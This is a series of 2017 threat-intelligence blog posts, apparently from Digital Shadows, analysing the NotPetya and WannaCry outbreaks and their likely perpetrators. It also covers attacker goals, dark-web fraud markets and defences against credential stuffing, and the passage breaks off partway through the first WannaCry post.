    Petya-Like Wormable Malware: The “Who” and the “Why” Fri, 30 Jun 2017 16:15:38 +0000 Late on 27 June, the New York Times reported that a number of Ukrainian banks and Ukrenergo, the Ukrainian state power distributor, had been affected by unidentified malware which caused significant operational disruption. Multiple security vendors and independent researchers subsequently identified the malware as a wormable ransomware variant with functional and technical similarities to Petya. Based on these similarities and continuing confusion, the malware has been dubbed Nyetya, Petna, ExPetr, and NotPetya, among others. It has been linked with a large number of infections, a significant proportion of which (around 60% according to statistics published by Kaspersky) affected machines in Ukraine, though at the time of writing the overall number of infections is not known.

    How NotPetya Works

    On 27 June, a social media account used by the National Police of Ukraine Cyberpolice Department, suggested that the reported infections originated from a compromised software update delivered to users through MeDoc, a Ukrainian accounting software provider. While MeDoc has denied this, Microsoft has confirmed that a small number of infections were the result of malware being delivered to machines by the MeDoc’s software update process. Once the malware was installed, intra-network propagation functions enabled it to rapidly spread between networked machines over the following vectors:

    • EternalBlue and EternalRomance exploits: EternalBlue and EternalRomance are exploits for SMB remote code execution vulnerabilities (CVE-2017-0144 and CVE-2017-0145) leaked by the Shadow Brokers in April These exploits were reportedly used to propagate between networked machines running SMB. Patches for these vulnerabilities were released by Microsoft in March (MS17-010) and in May.
    • PsExec: The ransomware used a tool similar to Mimikatz to harvest user credentials. These credentials were then passed to an older version of the PSExec Windows tool which was dropped by the malware. This tool then attempted to use PowerShell remote functionality to copy itself onto a target machine and begin execution.
    • Windows Management Instrumentation (WMI): The malware also enumerated Windows network shares with WMI and attempted to launch a copy of itself on any discovered network shares.

    Figure 1 below shows a possible deployment and propagation process for the malware.

    Deployment and intra network propagation Petya

    Figure 1 – Deployment and intra-network propagation

    Once installed, the malware functioned similarly to Petya, checking for the availability of Administrator privileges by using the Windows API AdjustTokenPrivileges function. If this was successful, the malware would overwrite the infected machine’s Master Boot record (MBR), rendering it unbootable. If this was not possible, AES-128 keys were used to encrypt each individual file, with the AES keys subsequently being encrypted using an RSA-2048 public key. To obtain the private RSA key necessary to recover the AES keys, victims were instructed to transfer $300 USD in Bitcoin to a specified Bitcoin ID and send their wallet ID and victim ID number in an email to a specified address.


    While the malware’s functionality has reportedly made it highly effective at propagating to machines within a local network, it has been reported as having no function for spreading outside of these local networks. It was therefore assessed as likely to be much more effective for conducting targeted attacks than wCry (AKA WannaCry).

    In the case of NotPetya, it is highly likely that the ransom payment method was never intended to result in revenue for attackers or the recovery of victim data. Although the email service provider with which the account was registered has publicly announced that this account has been disabled, it has subsequently been reported that victim ID numbers were pseudo randomly generated rather than being derived from the RSA key used for AES key encryption. This indicates that it would not be possible for the threat actors to provide victims with the correct decryption key, even if a victim had paid the ransom and succeeded in making contact. Furthermore, Matt Suiche has reported that, unlike Petya, which encrypts an infected machine’s MBR in a reversible manner, this malware reportedly irreversibly overwrote 24 sector blocks of the MBR section of an infected machine’s disk, rendering it permanently inoperable.

    With monetary gain as a motivation out the picture, the most likely motivation left for NotPeyta’s behavior is destructive malicious intent. Malicious intent is not synonymous with any single ‘class’ of threat actor, hacktivists ‘do it for the lulz”; nation state actors conduct malicious cyber-attacks to fulfill geostrategic objectives. With this in mind, NotPeyta does demonstrate an advanced understanding of how to mount a wide spread hard hitting cyber-attack, and to capitalize on this attack with maximum media exposure.


    Clues lie in the geopolitical context and the initial target geography of the malware. Kaspersky Labs have claimed a 60/30% split (total number of infections unknown) between Ukraine and Russia. Additionally, the initial attack occurred during the Ukrainian holiday celebrating independence from Russia. If one subscribes to the theory that Russian state or affiliated actors are responsible, this had the tactical effect of delaying a coherent response from Ukrainian defenders and strategically punishing Ukraine for its independence from Russia. Although these facts are interesting – and they do suggest that the malware was actively aimed at the Ukrainian economy – they are circumstantial and do not conclusively link the incident to any particular nation state. Attribution is and will continue to be a challenge.

    The technology behind this attack is well within the range of many hacktivists and cyber criminals, and so these details have less diagnostic value when considering the ‘who’. Although speculative, there are other factors to consider: the supply chain compromise, efforts at obfuscation (hiding the wiper as ransomware), the geography that the malware was deployed in, and the timing of the deployment with Ukrainian national holidays. These point towards an attacker with political motivations behind the attack. It seems that the actor behind the NotPetya variant was politically motivated with an exceptional appetite to conduct cyber-attacks against specific organizations within the Ukraine target geography.

    Longer-Term Implications

    So where does this incident leave the longer-term assessment of the implications of NotPetya?

    • Prepare for stray bullets. Many organizations were impacted by the NotPeyta campaign. The interconnectivity of modern systems and the ubiquity of applications means that enterprises could find themselves the victims of attacks not specifically targeting their organizations.
    • The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    Sadly, cyber-attacks of this nature are not uncommon and so businesses, governments and of course consumers need to take steps to protect themselves against ransomware attacks.

    1. The “basics” aren’t easy, but they should not be forgotten. Both NotPetya and the earlier WannaCry exploited basic and known security vulnerabilities, so segmenting networks and applying basic patching cycles will go a long way to mitigating threats such as this. This will go a long way in mitigating the ‘stray bullet’ factor outlined above.
    2. Think about the soft factors. Defense is not just about technical indicators and warning anymore, ‘soft’ factors such as motivation and geostrategic issues are now not just ‘nice to haves’ but are increasingly critical in the response to malware like NotPetya.
    3. Plan to fail. No amount of good security will entirely remove the risk posed by cyberattacks so it is critical to backup critical data and systems on a regular basis and ensure crisis management and comprehensive data recovery plans are in place and practiced.  Extortion and destructive malware response should be in your incident response playbooks.
    4. If you aren’t already doing so, think about the digital risks associated with your supply chain. Sure, not all suppliers are attack vectors for targeted attacks, but many suppliers do not have the mature levels of security. Regardless of the alleged culpability of MEDoc, the deployment mechanism does highlight the attention that we all need to start paying to supply chain compromise.
    5. Defense in depth. Digital Shadows advocate using a ‘defense in depth’ strategy guided by four main principles: configuring host-based firewalls and using IP-whitelisting measures, segmenting networks and restricting workstation-to-workstation communication, applying patches and disabling unneeded legacy features, and restricting access to important data to only those who are required to have it.

    WannaCry and NotPeyta are a sign of things to come, and you can expect attackers will improve their future campaigns.

    Keep Your Eyes on the Prize: Attack Vectors are Important But Don’t Ignore Attacker Goals Fri, 23 Jun 2017 16:45:41 +0000 Reporting on intrusions or attacks often dwells on the method that the attackers used to breach the defenses of a particular organization. However, the goals of the attacker are the most relevant to how an organization can protect itself. The goals of attackers reflect the perceived value of the critical assets an organization has to the attackers, which is independent from the value these assets have to the organization.

    The table below shows a carefully chosen sample of well-documented attacks on what attackers consider to be high-value or critical assets. It is worth noting the following attacks were performed by a mixture of nation states, mercenaries, nation state proxies, cyber criminals and hacktivists, showing a complex ecosystem. We do not aim to provide definitive attribution here, merely state which are the most likely candidates based on assessments from law enforcement or the wider community.

    High Value Asset Sector Threat Actor Impact on Target Examples
    Corporate IT infrastructure All Cyber criminals, nation-state process, nation states Availability Ransomware attacks like WannaCry or the Sony Pictures Entertainment attack deny access to IT resources in order to extort money from the victims and/or cause embarrassment
    All Nation states Confidentiality Russian-affiliated threat groups broke into a Voting software company in order to use their IT infrastructure to send phishing emails to subsequent targets
    Customer (WiFi) Networks Hospitality Nation states Confidentiality The Darkhotel APT group used hotel networks to target individuals of interest and deploy malware to customer machines through malicious software updates
    Cryptographic material Technology Cyber criminals, nation states Confidentiality DigiNotar’s cryptographic keys were stolen in order to forge certificates for eavesdropping on Internet users in Iran
    Database All Cyber criminals Confidentiality, Integrity, Availability The RansomWeb attack encrypted the victim’s database covertly and when the database and backups were fully encrypted, the encryption keys were removed, the database was inaccessible and ransom demands were made to the victim
    Financial transaction systems Finance Cyber criminals, nation states Confidentiality, Integrity Attackers breached various banks worldwide to send money to mule accounts via the SWIFT network infrastructure
    Finance Nation states Confidentiality Alleged Equation Group leaks detail the compromise of the SWIFT Service Bureau Eastnets to extract transaction information from their database
    Industrial process design and development Manufacturing, Aerospace, Defence Freelancers Confidentiality Su-Bin stole component design blueprints and flight test data for sale to competing companies
    Network infrastructure Broadcasting Nation states Availability TV5Monde’s routers and switches were corrupted by malicious firmware updates which caused the TV station to cease broadcasting
    Non-public information All Nation states Confidentiality Hackers allegedly from PLA Unit 61398 stole “thousands of e-mails and related attachments that provided detailed information about SolarWorld’s financial position, production capabilities, cost structure, and business strategy”
    Finance, Legal Cyber criminals Confidentiality Hackers stole non-public press releases about upcoming announcements by public companies concerning earnings, gross margins, revenues, etc. and used this information to conduct trades
    Source code Technology Freelancers, nation states Confidentiality Attackers compromised Yahoo in order to find the source code so they could forge cookies to gain persistent, unauthorized access to user accounts
    Payment card information Retail Cyber criminals Confidentiality Attackers stole 40 million records of payment card information from Target’s Point of Sale (PoS) systems via breaking into a supplier who had access to the Target network
    PHI/PII Healthcare Cyber criminals Confidentiality 80 million customer records were stolen from Anthem, this data may be used for espionage and/or financial crime such as filing fraudulent tax returns and issuing of pre-paid debit cards
    SCADA systems Energy Nation states Availability A cyber-attack was performed against a Ukrainian power company’s circuit breakers causing the loss of power to approximately 225,000 customers
    Social Media accounts All Cyber criminals Availability Wired reporter Mat Honan had his various cloud service accounts breached and his devices remotely wiped in order to takeover his social media account
    All Nation state proxy Integrity The Syrian Electronic Army hijacked the social media accounts of various global companies in order to spread propaganda

    A common theme running through the above table is how attackers take the path of least resistance to their goals and in the cases where critical assets were not reachable, used a creative approach to monetize the access that they did have.

    Some common themes concerning attacker goals emerge:

    • Attacks are a multi-stage process, each stage helps the attackers get closer to their goal. An organization may be compromised for its own assets or because its assets help an attacker reach its target. Financially-motived cyber criminal actors seek out not only directly monetizable assets like payment card information but also assets which can be sold such as PHI/PII or non-public information.
    • Sectors such as finance and defense are well-known targets for attackers, but following on from the multi-stage theme above, other organizations may find themselves as targets as they are on the “flight path” from the attacker to the intended target, for example, in the case of supply chain compromise.
    • While theft is very common (confidentiality violations), attacks on availability, such as extortion via ransomware, and attacks on integrity, such as source code manipulation, do also occur. Attackers have a diverse set of actions in their portfolio and may use any of them against a particular target.

    By understanding the goals of the attackers, defenders can understand which of their assets need to be safeguarded. Any breach investigation or incident response should attempt, where possible, to understand the goals of the attackers in order to gain insight on how attackers are targeting an organization’s assets.

    Recent attacks like the Nyetna outbreak highlight the difficulty of certainty around attacker goals as there may be deliberate attempts by the attacker to obscure their true goals, in such cases the different plausible attacker goals must be considered.

    We recently wrote a blog on five ways security engineering can help to protect these assets.

    Threats From the Dark Web Mon, 26 Jun 2017 16:22:44 +0000 Despite the hype associated with the dark web, maintaining visibility into it is an important component of a comprehensive digital risk management program. In support of our announcement today about the expansion of our SearchLight’s dark web collection capabilities, we wanted to highlight some of the digital risks that can be associated with the dark web in this blog. It is important note that these risks can also occur on the open and deep web, just as with our previous research on sites like

    Dark Web Risks

    Criminals are stealing customer data through payment systems and they are talking about it on the dark web

    The insecurity of payments systems makes the news frequently. Take the recent Chipotle breach, which resulted from malware on their Point of Sale devices. It’s important for retailers (and any organizations with ATMs or PoS devices) to ensure these devices and their transactions are secure. Having visibility into criminal forum conversations that discuss committing fraud against these devices, third parties or your company is critically important. It is also important to have visibility into the items for sale in criminal marketplaces that could be used to conduct fraud. This can be in many forms; it might be in a guide for ATM skimmers (Figure 1), or product listings for specific hardware. Having visibility to these dark web conversation can make the difference in stopping or mitigating a breach.

     ATM Skimming Guide

    Figure 1: Dark Web Marketplace offering guides on how to make ATM skimmers

    Criminals are selling customer account details on the dark web

    For banks seeking to protect their customers, gaining visibility and monitoring the dark web can be a highly valuable tool to stop fraud. Adversaries share credit card numbers on IRC channels (Figure 2) and sell accounts on dark web forums (Figure 3). Detecting these activities gives banks better visibility into their customers’ online exposure and enables them to get on the offense to minimize the impact.

    IRC BINs

    Figure 2: IRC channel sharing and testing customer credit card information

    Forum account for sale 

    Figure 3: Accounts for sale on the dark web

    Criminals are taking over employees and customers’ accounts

    It isn’t always a company’s assets that are at risk; organizations can also gain awareness of tools used against them. Figure 4 is an example of a tactic used to bypass SMS account verification. Understanding the latest tactics used by adversaries is vital for organization’s security decision-making to reduce their risk profile.

    Bypassing SMS

    Figure 4: New tool for bypassing SMS authentication offered, mentioning specific sites

    Criminals are conducting tax return fraud

    Tax milestones throughout the year are popular times for fraud, and tax information is high in demand by cybercriminals. Approaching the deadline for 2017’s tax return, we detected a user claiming to sell access to the PCs of an individuals working for accounting companies. The accompanying screenshots indicated that the user had access to information on hundreds of companies in the United States.

    tax fraud dark web 

    Figure 5: User selling access to an accounting company’s customer information, consisting sensitive tax information

    Digital Shadows provides the context you need to manage dark web threats

    It isn’t enough to simply detect mentions of company assets and concerns across the dark web. Organizations need context behind these posts to have a better understanding. As a result, today we announced an expansion of our SearchLight’s dark web collection capabilities where we help our customers manage their dark web threats in five ways:

    1. Detailed Explorer view. View the post in Searchlight’s explorer view to see previous posts by other users on the same thread or post. This enhanced view provides organizations with added context, enabling them to better understand how their company, employees or customers are likely to be impacted.
    2. Dark Web User Background. The incident also provides an overview of the user in question, with their username, date joined, activity levels and reputation. This enables you to understand the credibility of the dark web user, informing your response.
    3. Incident view with context. The incident includes a description, impact and recommendation action, all of which are written up by our team of expert analysts. This helps you to make a more informed decision about the risk to your business.
    4. Detailed Source Background. Pivot from the incident into the intelligence view, providing context on the forum or marketplace. This context includes a description, timeline of events, associations, intelligence, and associated sites and social media accounts.

    The importance of our team of data analysts extends beyond adding vital and relevant context. Not all dark or deep web sites can be easily accessed with technology on its own; expert human data analysts must also gain access to closed sources to provide the most relevant view of digital risks. Digital Shadows recognizes it is critical to complement automation with a team of data scientists and intelligence experts who gain access to closed sources, and qualify the data collected to enhance analytic capabilities. This gives our customers the full breadth and context needed to address the digital risks that are most relevant and impactful to their business. searchlight incident view

    Figure 6: SearchLight’s incident view, complete with vital context

    Armed with this vital context, organizations are better informed about the risks they face online across the open, deep and dark web; understanding not only when they are mentioned online, but also why, by whom and the likely impact to your organization.

    To learn more about Digital Shadows Searchlight™ dark web monitoring capability, watch this demo video or read our datasheet for more details.

    WannaCry: An Analysis of Competing Hypotheses – Part II Wed, 07 Jun 2017 16:30:52 +0000 Following the furore of last month’s WannaCry ransomware attacks, Digital Shadows produced an Analysis of Competing Hypotheses (ACH) table to make some initial assessments on the type of actor most likely to have been responsible for the campaign. First and foremost, the ACH method was chosen as it allows us to assess the reliability and relevance of the data available on open sources. As with most investigations, new evidence may emerge over time prompting us to re-examine previous assumptions and theories.

    In the case of WannaCry, several, potentially significant, data points have come to light in recent weeks, including:

    • The code similarities found between WannaCry samples from February 2017 and those previously used by the Lazarus Group have been further corroborated by other sources within the security community. We have, therefore, raised the Credibility of this data point to medium and the Relevance to high. Likewise, for reported malware similarities between WannaCry and other North Korean operations, we have also raised the Credibility of this data point to medium.
    • According to Sophos and Nominum Inc., the first evidence for WannaCry was found when a client from an ISP in Southeast Asia hit WannaCry’s “kill-switch” domain. While this type of evidence is not definitive, our own analysis of Google trending data indicated that users in Taiwan were one of the first to begin searching for WannaCry. The graph below, taken from Google API data, plots the normalized number of Google searches for the term “wana decryptor 2.0” (the term that appeared on the ransom note) by time and by country. Here we see that users in Taiwan began searching for the term “wana decryptor 2.0” at about 6am BST (1pm Taiwan time). As this graph relies on Google API data, Chinese searches were not included; nevertheless, there is a strong indication that south-east Asia was the first region to be affected by the ransomware.

    WannaCry 2 Searches

    Figure 1: Google searches for “wanna decryptor 2.0” by country (Please note that the y-axis does not represent the number of Google searches, but is instead a normalized number signifying the percentage of searches in that country for a specific term (in this case “wana decryptor 2.0”) in relation to all other Google searches.)

    • Language analysis of the various WannaCry ransom messages has indicated that 26 of the 28 messages were machine-translated from English. The Chinese-language version, however, appeared to have been written by a native speaker, and contained a typo that would highly unlikely have been the result of machine translation.

    As before, we considered four hypotheses for this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Once we add the new and amended data points, the table looks as follows:

    Wannacry ACH 2

    ACH Key

    Figure 1 – ACH diagram

    While the above points do not drastically change the outcome of our initial ACH table, the inconsistency score between H2 (an unsophisticated cybercriminal actor) and H4 (a nation-state or state-affiliated actor looking to discredit the NSA) does narrow. With so little between them, the margin of error is such that both scenarios were equally plausible. We therefore assessed that, based on the information available at the time of writing, the WannaCry campaign was most likely launched by either:

    a)     An unsophisticated financially-motivated cybercriminal actor – H2

    b)     A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Alternative hypotheses?

    As rightly mentioned by Pasquale Stirparo in a recent SANS blog referencing Digital Shadows, the ACH technique encourages collaborative discussion and alternative viewpoints. Our original aim in creating this ACH was to provide a structured analysis of the general type of threat actor responsible for WannaCry and – perhaps more significantly – this actor’s potential motivation. Our four original hypotheses were, therefore, fairly broad, and we have avoided focusing on specific threat actors given the inherent difficulty in providing attribution. Pasquale built upon our original ACH table by adding new data points and three alternative hypotheses, and we hope others will attempt their own analyses and further highlight the usefulness of this technique. While Pasquale chose to break out H4 into separate hypotheses for a (1) nation-state actor aiming to discredit the NSA and a (2) generic threat actor with the same motivation, we have decided to uphold our original four hypotheses given the overlapping objectives of these actors.[1]

    The death of Lazarus?

    The Lazarus Group remains one of the most difficult to incorporate into our ACH analysis, for several reasons. Firstly, there is still no clear, confirmed explanation for who this group is and how it operates. We have previously assessed it to be highly likely that the group has some affiliation with the North Korean state (DPRK) due to a significant proportion of the group’s activities being aligned with North Korea interests. While Lazarus’ pre-2016 activity mainly consisted of espionage-focused and disruptive operations, their more recent operations, such as the reported attacks on SWIFT banking networks, appear to be financially-motivated and more akin to the actions of an organized criminal group. There are, therefore, many unanswered questions: is Lazarus a standing unit of the DPRK’s intelligence services? If not, are they an organized criminal group? Lazarus command and control infrastructure has, at different points, been identified on both North Korean and Chinese ISPs – so where are they based? As we have yet to detect any conclusive evidence directly linking the group’s more recent financially motivated activity to the DPRK, we have developed alternative hypotheses for the nature of the Lazarus Group:

    1. The Lazarus Group is an organized crime group (OCG) based outside of the DPRK but with connections to the DPRK state via a relationship with foreign service elements of the Korean People’s Army (KPA). The group is tasked to perform operations on behalf of the DPRK by a case officer, but also operates for private profit.
    2. The Lazarus Group is a KPA unit, but does not always operate based on direct taskings and sometimes its operators conduct financially motivated operations. The unit is based outside the DPRK, which facilitates this activity.
    3. The Lazarus Group is not a single entity. Multiple individuals or groups have gained access to technical assets developed by the Lazarus Group through intentional or unintentional leaks, thefts or through sales.

    The nebulous nature of Lazarus creates obvious difficulties for our ACH analysis. Do we consider them a nation-state actor (therefore falling under H3 and H4), or an organized criminal group who at times work on behalf of state actors (H1)? Without having a clear understanding of what type of threat actor Lazarus is, it becomes very difficult to incorporate it into an ACH analysis designed to tackle our original question: what type of actor most likely to have been behind the WannaCry attacks?

    This is not to say that we are discounting the Lazarus Group. Far from it. The group could easily be considered as an example of three of our four original hypotheses (H1, H3 and H4). With H4 being one of our two most plausible scenarios, the case for Lazarus has certainly not gone cold. The new data points we have added – specifically that users in south-east Asia were reportedly among WannaCry’s first victims and the original ransom note was written by a native Chinese speaker – also point towards an East Asian nexus, which may or may not be significant for those considering a Lazarus Group attribution.

    This approach encourages collaboration within the community and enables us to think critically about evidence. By incorporating ACHs into their analysis, threat intelligence teams can make sense of the various pieces of evidence and better understand the likely motivations of adversaries.


    [1] We would also like to thank Pasquale for highlighting a formatting error in our original blog post that led to a small discrepancy in the inconsistency weighting score for H2.

    7 Tips for Protecting Against Account Takeovers Mon, 22 May 2017 19:16:16 +0000 In May 2017, an amalgamation of over 1 billion credentials was uploaded to the Have I Been Pwned database. One of the lists has been dubbed “Anti-Public”, and contained 457,962,538 unique email addresses. This list has reportedly previously been widely circulated and used for credential stuffing attacks, whereby attackers seek to identify instances of password reuse in order to compromise further accounts. (“Anti-Public” is also the name of a credential stuffing tool used to verify the legitimacy of compromised credentials).

    What is Credential Stuffing?

    Credential stuffing is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found. Our latest whitepaper looks at what credential stuffing is and what tools are being used for it. Later in this blog, I will outline seven tips you can take to protect against account takeover.

    There are billions of leaked credentials exposed online, so chances are that many of these have reused usernames and passwords. These are valuable to cybercriminals, who are increasingly turning to credential stuffing tools to automate attempts at account takeover. By looking at the site sentry[.]mba, its possible to get an idea of the most targeted organizations and sectors. Common targets for these attacks are the gaming, technology, broadcasting and retail sectors (see below).

    Sentry MBA Configuration Count

    Figure 1: The most prevalent sectors, based on the number of configuration files shared (green) and downloaded (purple) for organizations

    There are many credential stuffing tools available to cybercriminals but three stand out: SentryMBA, Vertex and Hitman. Our paper takes a look at how easy it is for cybercriminals to execute account takeovers. To protect yourself against account takeover, implement the following:

    1.  Monitor for leaked credentials of your employees. Troy Hunt’s is a great resource for this, alerting you to instances of breaches including your organization’s email domain.

    2.  Monitor for mentions of your company and brand names across cracking forums. This can help to direct your security investment. Use Google Alerts for this – Johnny Long offers some great tips for doing so ( and google alerts can provide a good identification of the specific risks to your business. Configuration files for your website that are being actively shared and downloaded are probably a good indication of impending attempts at account takeover.

    3.  Monitor for leaked credentials of your customers, allowing you to take a more proactive response. Consider alerting your customers that their email has been involved in a breach, prompting them to reset their password if they have reused credentials.

    4.  Deploy an inline Web Application Firewall. Commercial and open source web application firewalls, like ModSecurity, can be used to identify and block credential stuffing attacks.

    5.  Increase user awareness. Educate your staff and consumers about the dangers of using corporate email addresses for personal accounts, as well as reusing passwords.

    6.  Gain an awareness of credential stuffing tools. Keep an eye on the development of credential stuffing tools, and monitor how your security solutions can protect against evolving capabilities. Some credential stuffing tools are able to bypass some CAPTCHAs, for example.

    7.  Implement multi-factor authentication that doesn’t leverage SMS. This can help to reduce account takeovers, but make sure this is balanced against the friction (and cost) it can cause.

    WannaCry: An Analysis of Competing Hypotheses Thu, 18 May 2017 17:35:21 +0000 On 12 May 2017, as the WannaCry ransomware spread across computer networks across the world, a variety of explanations also began to worm their way through the information security community. Who was responsible for the WannaCry campaign? And what was the objective? Ransomware suggested it was the work of cybercriminals, although, given the sheer scale of infections and disruption, some commentators suspected the hand of a nation state. Despite relentless analysis from the security research community that has brought fragments of new information to the fore, no consensus has yet been reached on an attribution for the campaign.

    One of the most recent theories put forward rests on a possible connection between WannaCry and the Lazarus Group, an actor that has previously been linked with several high-profile network intrusions and assessed as highly likely to have some association with the Democratic People’s Republic of Korea (DPRK). Analysis has indicated that WannaCry samples from February 2017 contained a small section of code identical to those used in previous Lazarus campaigns. At the time of writing, however, we assessed there to be insufficient evidence to corroborate this claim of attribution to this group, and alternative hypotheses should be considered. While malware may initially be developed and used by a single actor, this does not mean that it will permanently remain unique to that actor. Malware samples might be accidentally or intentionally leaked, stolen, sold, or used in independent operations by individual members of a group. It is therefore important to consider other factors, such as the consistency of an operation with previous activity attributed to an actor.

    Digital Shadows has, therefore, applied the Analysis of Competing Hypothesis (ACH) technique to the information currently available through sources. ACH uses a weighted inconsistency algorithm to assign numeric values – weighted by the assessed reliability and relevance of each data point – to represent how consistent the available evidence is with a given hypothesis. While the aim here was not to provide a conclusive attribution for the WannaCry campaign, this structured analytical technique allows us to assess the reliability and relevance of the data presented thus far, as well as make some tentative assessments over the type of actor most likely to have been behind last week’s attacks. As such, we compared four hypotheses for the purposes of this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Using a mixture of primary and secondary reporting, as well as assessments from Digital Shadows analysts, we have included a collection of the most salient data points to have emerged at the time of writing. As well as the widely-discussed use of the DOUBLEPULSAR backdoor dropper, ETERNALBLUE exploit, and SMB vulnerability, the latter for propagation, we have included several other pieces of eviden